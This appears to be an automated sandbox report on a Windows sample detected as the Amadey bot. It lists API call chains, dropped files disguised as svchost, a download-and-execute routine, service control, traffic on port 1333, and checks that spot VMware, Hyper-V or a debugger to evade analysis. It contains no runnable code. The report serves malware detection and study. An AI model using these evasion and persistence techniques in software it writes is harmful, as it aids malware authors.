Source: yaALNupJCH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: yaALNupJCH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: yaALNupJCH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: yaALNupJCH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: yaALNupJCH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CEA251 push eax; iretd	0_2_00CEA43D
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CEA251 push eax; iretd	0_2_00CEA851
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CEA43E push eax; iretd	0_2_00CEA43D
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CEA661 push eax; iretd	0_2_00CEA851
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CEAE1E push eax; iretd	0_2_00CEAE25
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CC2F16 push ecx; ret	0_2_00CC2F29
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00457046 push ecx; ret	2_2_00457059
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0045B11A push esp; ret	2_2_0045B141
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0045E54D push esi; ret	2_2_0045E556
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00457968 push eax; ret	2_2_00457986
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00434DB6 push ecx; ret	2_2_00434DC9
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CEA251 push eax; iretd	2_2_00CEA43D
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CEA251 push eax; iretd	2_2_00CEA851
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CB5467 push ebx; retn 0000h	2_2_00CB546A
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CEA43E push eax; iretd	2_2_00CEA43D
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CEA661 push eax; iretd	2_2_00CEA851
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CEAE1E push eax; iretd	2_2_00CEAE25
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CC2F16 push ecx; ret	2_2_00CC2F29
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0042C555 push ecx; ret	3_2_0042C568
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_004256D7 push ecx; ret	3_2_004256EA

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_0041CA9E LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

2_2_0041CA9E

Source: yaALNupJCH.exe

Static PE information: section name: uvhg

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1025890323.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR

Source: C:\Users\user\Desktop\yaALNupJCH.exe	File created: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll	Jump to dropped file
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe	Jump to dropped file

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_00406EB0 ShellExecuteW,URLDownloadToFileW,

2_2_00406EB0

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_0041A998 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

2_2_0041A998

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 1333
Source: unknown	Network traffic detected: HTTP traffic on port 1333 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 1333
Source: unknown	Network traffic detected: HTTP traffic on port 1333 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 1333
Source: unknown	Network traffic detected: HTTP traffic on port 1333 -> 49810

Source: C:\Users\user\Desktop\yaALNupJCH.exe

2_2_0041CA9E

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_0040F6F5 Sleep,ExitProcess,

2_2_0040F6F5

Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7432	Thread sleep count: 3362 > 30	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7432	Thread sleep time: -100860000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7452	Thread sleep time: -1260000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7448	Thread sleep time: -1080000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7432	Thread sleep count: 5848 > 30	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7432	Thread sleep time: -175440000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7552	Thread sleep count: 1403 > 30	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7552	Thread sleep time: -4209000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7552	Thread sleep count: 8588 > 30	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe TID: 7552	Thread sleep time: -25764000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

2_2_0041A696

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Thread delayed: delay time: 180000			Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Window / User API: threadDelayed 3362	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Window / User API: threadDelayed 5848	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Window / User API: threadDelayed 1403	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Window / User API: threadDelayed 8588	Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe

API coverage: 8.7 %

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe	Jump to dropped file

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 2_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

2_2_00407C97

Source: C:\Users\user\Desktop\yaALNupJCH.exe	API call chain: ExitProcess graph end node	graph_2-66684
Source: C:\Users\user\Desktop\yaALNupJCH.exe	API call chain: ExitProcess graph end node	graph_3-69779
Source: C:\Users\user\Desktop\yaALNupJCH.exe	API call chain: ExitProcess graph end node	graph_3-69850

Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\yaALNupJCH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`Y
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885731631.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907353179.000000000112D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: yaALNupJCH.exe, 00000002.00000003.885731631.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWdH
Source: yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP{S
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 0_2_00CB4210 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_00CB4210

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CCBB8B FindFirstFileExW,	0_2_00CCBB8B
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0041C1DF FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	2_2_0041C1DF
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	2_2_00409253
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0040C29B FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	2_2_0040C29B
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	2_2_00409665
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0044E739 FindFirstFileExA,	2_2_0044E739
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	2_2_0040880C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0040783C FindFirstFileW,FindNextFileW,	2_2_0040783C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00419A43 FindFirstFileW,FindNextFileW,FindNextFileW,	2_2_00419A43
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0040BA7E FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	2_2_0040BA7E
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0040BC85 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	2_2_0040BC85
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CCBB8B FindFirstFileExW,	2_2_00CCBB8B
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0040F19B _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_0040F19B
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00413234 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,	3_2_00413234
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0040F465 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_0040F465
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0040F6AB wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_0040F6AB
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0041D9AB __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindNextFileW,	3_2_0041D9AB
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00416BAA wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,	3_2_00416BAA
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00412CAC wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00412CAC
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0040AFE9 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,PathMatchSpecA,CoInitialize,PathMatchSpecA,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	3_2_0040AFE9
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_0040A6DC __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlenA,_MSFOpenExW,_memset,	3_2_0040A6DC
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00409810 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00409810
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00412AC1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_00412AC1
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 3_2_00412EF7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,	3_2_00412EF7

Source: C:\Users\user\Desktop\yaALNupJCH.exe

2_2_0041CA9E

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CC4AB1 mov eax, dword ptr fs:[00000030h]	0_2_00CC4AB1
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CC82B2 mov eax, dword ptr fs:[00000030h]	0_2_00CC82B2
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00443214 mov eax, dword ptr fs:[00000030h]	2_2_00443214
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CC82B2 mov eax, dword ptr fs:[00000030h]	2_2_00CC82B2
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CC4AB1 mov eax, dword ptr fs:[00000030h]	2_2_00CC4AB1

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 0_2_00CC2B00 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00CC2B00

Source: C:\Users\user\Desktop\yaALNupJCH.exe

Code function: 0_2_00CCCDE1 GetProcessHeap,

0_2_00CCCDE1

Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CC2C65 SetUnhandledExceptionFilter,	0_2_00CC2C65
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CC309D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00CC309D
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CC2B00 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CC2B00
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 0_2_00CC6E28 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CC6E28
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00434A95 SetUnhandledExceptionFilter,	2_2_00434A95
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00434947 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00434947
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_0043BA62 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0043BA62
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00434F3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00434F3C
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CC309D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00CC309D
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CC2B00 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00CC2B00
Source: C:\Users\user\Desktop\yaALNupJCH.exe	Code function: 2_2_00CC2C65 SetUnhandledExceptionFilter,	2_2_00CC2C65
